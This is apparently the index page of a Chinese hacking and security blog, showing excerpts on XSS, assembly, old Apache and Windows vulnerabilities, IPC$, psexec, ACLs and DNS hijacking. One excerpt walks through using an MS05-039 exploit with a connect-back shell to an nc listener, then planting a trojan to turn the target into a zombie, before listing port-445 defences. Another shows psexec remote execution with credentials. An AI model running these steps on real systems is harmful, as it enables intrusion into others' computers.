亲手博客

到目前为止，对于跨站点脚本攻击具有很大的威胁这一点大家并无异议。如果您很精通 XSS 并且只想看看有什么好的测试方法可供借鉴，那么请直接跳到本文的测试部分。如果您对此一无所知，请按顺序认真阅读！如果某个怀有恶意的人（攻击者）可以强 迫某个不知情的用户（受害者）运行攻击者选择的客户端脚本，那么便会发生跨站点脚本攻击。“跨站点脚本”这个词应该属于用词不当的情况，因为它不仅与脚本 有关，而且它甚至不一定是跨站点的。所以，它就是一个在发现这种攻击时起的一个名字，并且一直沿用至今。从现在开始，我们将使用它常见的缩写名称 “XSS”。 (全文…)

听一个同学说要考汇编语言，在我印象中汇编就是用ollyice找注册码，又很多指令我也不清楚，在网上找了一些常用的，为了自己方便查阅吧！

汇编常用命令
MOV 指令为双操作数指令,两个操作数中必须有一个是寄存器.
MOV DST , SRC // Byte / Word
执行操作: dst = src
1.目的数可以是通用寄存器, 存储单元和段寄存器(但不允许用CS段寄存器).
2.立即数不能直接送段寄存器
3.不允许在两个存储单元直接传送数据
4.不允许在两个段寄存器间直接传送信息 (全文…)

影响版本:
Apache Software Foundation Apache 2.2.11
Apache Software Foundation Apache 2.2.10
Apache Software Foundation Apache 2.2.9
Apache Software Foundation Apache 2.2.8
Apache Software Foundation Apache 2.2.6
Apache Software Foundation Apache 2.2.5
Apache Software Foundation Apache 2.2.4
Apache Software Foundation Apache 2.2.3
Apache Software Foundation Apache 2.2.2
Apache Software Foundation Apache 2.2.7-dev
Apache Software Foundation Apache 2.2.6-dev
Apache Software Foundation Apache 2.2.5-dev
Apache Software Foundation Apache 2.2.1
Apache Software Foundation Apache 2.2漏洞描述:
Bugraq ID: 35623
CVE ID：CVE-2009-1891

Apache是一款流行HTTP服务程序。
Apache mod_deflat模块不正确处理特殊请求，远程攻击者可以利用漏洞使服务程序崩溃。
当mod_deflate启用时下载一个文件，在结束之前中止连接，会使CPU压缩文件达到100%利用率。
即使一个不太大的文件(几MB)，通过在这个文件中提交同步请求并马上中止连接，由于这个文件在平行过程中多次压缩，可导致消耗大量CPU时间而造成拒绝服务攻击。<*参考

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=534712

*>
SEBUG安全建议:
用户可参考如下链接获得补丁信息：

http://svn.apache.org/viewvc?view=rev&revision=791454

一 唠叨一下：这个漏洞已经很老了，但是今天在网吧溢出445端口的时候，没有得到shell倒是得到了一个空连接，所以值得再贴一下。网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! (全文…)

一、 漏洞基本情况
1、 漏洞名称及描述
名称：Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞
微软安全公告：MS03-007
Unchecked Buffer In Windows Component Could Cause Web Server Compromise(815021)
地址_blank href=http://www.microsoft.com/technet/security/bulletin/MS03-007.asp>http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
描述：IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据，远程攻击者利用这个漏洞
对WebDAV进行缓冲区溢出攻击，可能以Web进程权限在系统上执行任意指令。 (全文…)

C:\445>ms05039.exe 192.168.0.13 192.168.0.11 1234 1

MS05-039 Windows PnP Remote Overflow Exploit

Connect back shellcode Edition By superlone[EST]

Tested On Windows 2000 PRO SP4 CN

[+] Trying to connect to remote port on192.168.0.13:445…ESTABLISHED
[+] Making null session…OK
[+]Trying to bind pipe…OK

C:\445>nc.exe -vv -l -p 1234
listening on [any] 1234 …

第一步，我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到！比如SUPERSCAN这个端口扫描工具。

第二步，假设现在我们已经得到一台存在445端口漏洞的主机，那么我们就可以利用瑞士军刀nc和溢出工具ms05039进行攻击：
F:\445>ms05039 目标IP 本地IP 1234
。。。 。。。
。。。 。。。

F:\445>nc.exe -vv -l -p 1234
。。。 。。。
。。。 。。。

成功的话，就会返回一个shell，然后就可以用我们常用的命令了。比如让他去下载我们的木马或上传一个木马给他，然后运行，这样得到一只肉鸡了。

看了上面的这些，是不是觉得自己的电脑很危险？不用怕，下面我们就来解除这危险的445端口漏洞：

防范445端口漏洞的攻击方法：
1.端口排除法
这种方法利用了Windows 2000系统的端口排除功能将来自于445端口的所有信息包全部禁止掉，让“大

恶人”们无法接近你的主机，下面是这种方法的具体实现步骤：

打开Windows 2000系统的开始菜单，选中“设置”项下面的“网络和拨号连接”图标，并用鼠标右键单击之，从其后的快捷菜单中，单击“浏览”命令；

在接着出现的窗口中，右击“Internet连接”图标，选中“属性”选项，弹出Internet连接属性窗口；

打开“常规”标签页面，将其中的“Internet协议(TCP/IP)”项选中，然后再单击一下“属性”按钮，打开Internet协议(TCP/IP)属性设置页面；

继续单击该页面中的“高级”按钮，打开高级TCP/IP设置窗口，选中其中的“选项”标签，并在该标签页面的“可选的设置”项中，将“TCP/IP筛选”选中，再单击一下对应的“属性”按钮，打开TCP/IP筛选的设置口；

由 于445端口属于一种TCP端口，你可以在对应“TCP端口”的设置项处，将“只允许”项选中，激活下面的“添加”按钮，单击该按钮，在其后打开的“添加 筛选器”窗口中，将必须用到的几个服务端口号码，都添加进来，而将用不到的445端口号码排除在外，设置完毕后，单击“确定”按钮，就可以让设置生效了。

2.服务关闭法

考虑到文件夹或打印机共享服务才会利用到445端口，因此直接将文件夹或打印机共享服务停止掉，同样也能实现关闭445端口的目的，让黑客无法破坏各种共享资源，下面是关闭文件夹或打印机共享服务的具体步骤：

打开Windows 2000系统的开始菜单，选中“设置”项下面的“网络和拨号连接”图标，并用鼠标右键单击之，从其后的快捷菜单中，单击“浏览”命令；

在接着出现的窗口中，右击“Internet连接”图标，选中“属性”选项，弹出Internet连接属性窗口；

打开“常规”标签页面，并在“此连接使用下列选定的组件”列表框中，将“Microsoft网络的文件或打印机共享”选项前面的勾号取消，如图2所示。最后单击“确定”按钮，重新启动系统，Internet上的“大恶人”们就没有权利访问到各种共享资源了。

当然，你也可以在不停止共享服务的条件下，剥夺“大恶人”们的共享访问权利；利用本地安全设置中的“用户权利指派”功能，指定Internet上的任何用户都无权访问本地主机，具体步骤为：

在Windows 2000系统的开始菜单中，依次单击“程序”　“管理工具”　“本地安全设置”选项，接着展开“安全设置”　“本地策略”　“用户权利指派”文件夹，在对应的右边子窗口中选中“拒绝从网络访问这台计算机”选项，并用鼠标左键双击之；

打开设置窗口后，单击“添加”按钮，从弹出的“选择用户或组”对话框中选中“everyone”选项，再单击“添加”按钮，最后单击“确定”，这样任何一位用户都无法从网络访问到本地主机。

RAR 的自动解压文件功能使压缩包也能像 Setup 程序那样， RAR 的自动解压文件功能使压缩包也能像 Setup 程序那样，双击后显示一个软件许可，然后自动在指定位置解压文件，最后自动执行软件。

·软件解密包——软件解密需要将很多文件拷贝到安装目录覆盖原文件，烦琐的操作非常适合制作自动解密包 (全文…)

(1)psexec

psexec是一个远程执行工具，你可以像使用telnet一样使用它。

它的使用格式为：

psexec \\远程机器ip [-u username [-p password]] [-c [-f]] [-i][-d] program [arguments]

它的参数有： -u后面跟用户名

-p后面是跟密码的,如果建立ipc连接后这两个参数则不需要。（如果没有-p参数，则输入命令后会要求你输入密码）

-c <[路径]文件名>:拷贝文件到远程机器并运行（注意：运行结束后文件会自动删除）

-d 不等待程序执行完就返回，（比如要让远程机器运行tftp服务端的时候使用，不然psexec命令会一直等待tftp程序结束才会返回）

-i 在远程机器上运行一个名为psexesvc进程，(到底什么用弄不明白）

假设我在远程机器ip有一个账号，账号名是：abc 密码是：123 比如想要用telnet一样在远程系统上执行命令可以打： psexec \\远程机器ip -u abc -p 123 cmd 如果想要远程机器执行本地c:\srm.exe文件可以打： psexec \\远程机器ip -u abc -p 123 -c c:\srm.exe 如果想要让远程机器执行本地上tftp服务端，(假设tftp服务端在本地c:\tftp32.exe)，可以打： psexec \\远程机器ip -u abc -p 123 -c c:\tftp32.exe -d （后面例子不再重复-u和-p的用法） (全文…)

首先在介绍路由扩张技术之前先介绍几个概念

访问控制列表（Access Control List，ACL）

ACL可以工作在网络的二层（链路层）或是三层（网络层），以工作在三层的ACL为例，基本原理如下：想在某个路由器上用ACL控制（比如说是切断）对某个IP地址的访问，那么只要把这个IP地址通过配置加入到ACL中，并且针对这个IP地址规定一个控制动作，比如说最简单的丢弃。当有报文经过这个路由器的时候，在转发报文之前首先对ACL进行匹配，若这个报文的目的IP地址存在于ACL中，那么根据之前ACL中针对该IP地址定义的控制动作进行操作，比如丢弃掉这个报文。这样通过ACL就可以切断对于这个IP的访问。ACL同样也可以针对报文的源地址进行控制。如果ACL工作在二层的话，那么 ACL控制的对象就从三层的IP地址变成二层的MAC地址。从ACL的工作原理可以看出来，ACL是在正常报文转发的流程中插入了一个匹配ACL的操作，这肯定会影响到报文转发的效率，如果需要控制的IP地址比较多，则ACL列表会更长，匹配ACL的时间也更长，那么报文的转发效率会更低，这对于一些骨干路由器来讲是不可忍受的。 (全文…)

“知己知彼，百战不殆”。这一节我们需要用到前面提到的报文监听工具，以及参考其DNS劫持诊断一节。在Wireshark的filter一栏输入udp.port eq 53可以方便地过滤掉其他无关报文。为了进一步减少干扰，我们选择一个并没有提供域名解析服务的国外IP作为目标域名解析服务器，例如129.42.17.103。运行命令nslookup -type=A www.youtube.com 129.42.17.103。如果有回答，只能说明这是伪造回答，也就是我们要观测和研究的对象。
伪包特征
(全文…)